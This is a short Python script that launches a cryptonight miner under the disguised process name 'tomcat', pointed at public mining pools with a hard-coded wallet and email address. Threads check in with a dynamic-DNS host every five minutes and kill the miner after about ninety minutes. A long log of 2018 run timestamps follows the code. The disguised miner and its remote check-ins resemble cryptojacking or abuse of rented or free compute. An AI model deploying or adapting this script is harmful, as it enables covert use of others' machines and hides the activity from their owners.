import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:42:05.795843
#2018-02-17 16:29:04.122819
#2018-02-17 18:17:01.515040
#2018-02-17 20:03:03.807372
#2018-02-17 21:51:01.688717
#2018-02-17 23:35:09.173059
#2018-02-18 01:24:07.035933
#2018-02-18 03:11:06.529211
#2018-02-18 05:01:07.079091
#2018-02-18 06:53:07.216973
#2018-02-18 08:41:04.383300
#2018-02-18 10:27:03.730801
#2018-02-18 12:13:04.438879
#2018-02-18 13:59:06.082561
#2018-02-18 15:49:06.317893
#2018-02-18 17:39:03.656033
#2018-02-18 19:27:04.988481
#2018-02-18 21:11:03.725779
#2018-02-18 22:58:05.835805
#2018-02-19 00:46:06.890147
#2018-02-19 02:33:01.562424
#2018-02-19 04:19:02.200392
#2018-02-19 06:04:03.682789
#2018-02-19 07:52:01.621122
#2018-02-19 09:42:08.811925
#2018-02-19 11:32:06.398114
#2018-02-19 13:19:07.233281
#2018-02-19 15:06:08.370237
#2018-02-19 16:53:07.237563
#2018-02-19 18:41:08.935779
#2018-02-19 20:28:08.175137
#2018-02-19 22:15:08.218016
#2018-02-20 00:02:01.668696
#2018-02-20 01:48:01.815331
#2018-02-20 03:37:07.925587
#2018-02-20 05:24:07.383007
#2018-02-20 07:08:04.655734
#2018-02-20 08:53:08.278672
#2018-02-20 10:37:03.946946
#2018-02-20 12:23:08.883796
#2018-02-20 14:10:05.065640
#2018-02-20 15:53:10.204188
#2018-02-20 17:39:06.924162
#2018-02-20 19:29:08.290427
#2018-02-20 21:17:06.332655
#2018-02-20 23:02:03.950782
#2018-02-21 00:47:02.144405
#2018-02-21 02:34:06.150473
#2018-02-21 04:22:01.531038
#2018-02-21 06:08:06.699664
#2018-02-21 07:54:01.367063
#2018-02-21 09:39:05.197526
#2018-02-21 11:28:07.215817
#2018-02-21 13:18:08.195018
#2018-02-21 15:05:14.177573
#2018-02-21 16:54:11.778404
#2018-02-21 18:41:01.520905
#2018-02-21 20:27:01.263271
#2018-02-21 22:14:04.435356
#2018-02-22 00:04:05.533657
#2018-02-22 01:51:07.643173
#2018-02-22 03:38:01.977113
#2018-02-22 05:24:06.908600
#2018-02-22 07:09:06.051612
#2018-02-22 08:55:09.536374
#2018-02-22 10:43:04.546019
#2018-02-22 12:29:07.887673
#2018-02-22 14:15:05.635949
#2018-02-22 16:03:01.699197
#2018-02-22 17:48:09.437837
#2018-02-22 19:36:05.131867
#2018-02-22 21:28:08.862678
#2018-02-22 23:16:07.604034
#2018-02-23 01:09:08.418727
#2018-02-23 02:56:06.615216
#2018-02-23 04:43:04.615184
#2018-02-23 06:29:05.088491
#2018-02-23 08:16:07.014652
#2018-02-23 10:32:06.216348
#2018-02-23 12:26:04.489350
#2018-02-23 14:15:07.382537
#2018-02-23 16:07:04.998813
#2018-02-23 17:53:01.533386
#2018-02-23 19:40:01.646605
#2018-02-23 21:22:06.198826
#2018-02-23 23:11:06.208872
#2018-02-24 00:59:07.089972
#2018-02-24 02:53:08.049980
#2018-02-24 04:43:05.292184
#2018-02-24 06:27:03.790931
#2018-02-24 08:16:04.105199
#2018-02-24 09:59:02.079873
#2018-02-24 11:58:03.228611
#2018-02-24 13:45:07.877078
#2018-02-24 15:35:04.105158
#2018-02-24 17:28:01.980452
#2018-02-24 19:15:09.291576
#2018-02-24 21:03:01.285646
#2018-02-24 23:36:03.858523
#2018-02-25 02:57:03.354087
#2018-02-25 06:50:06.323665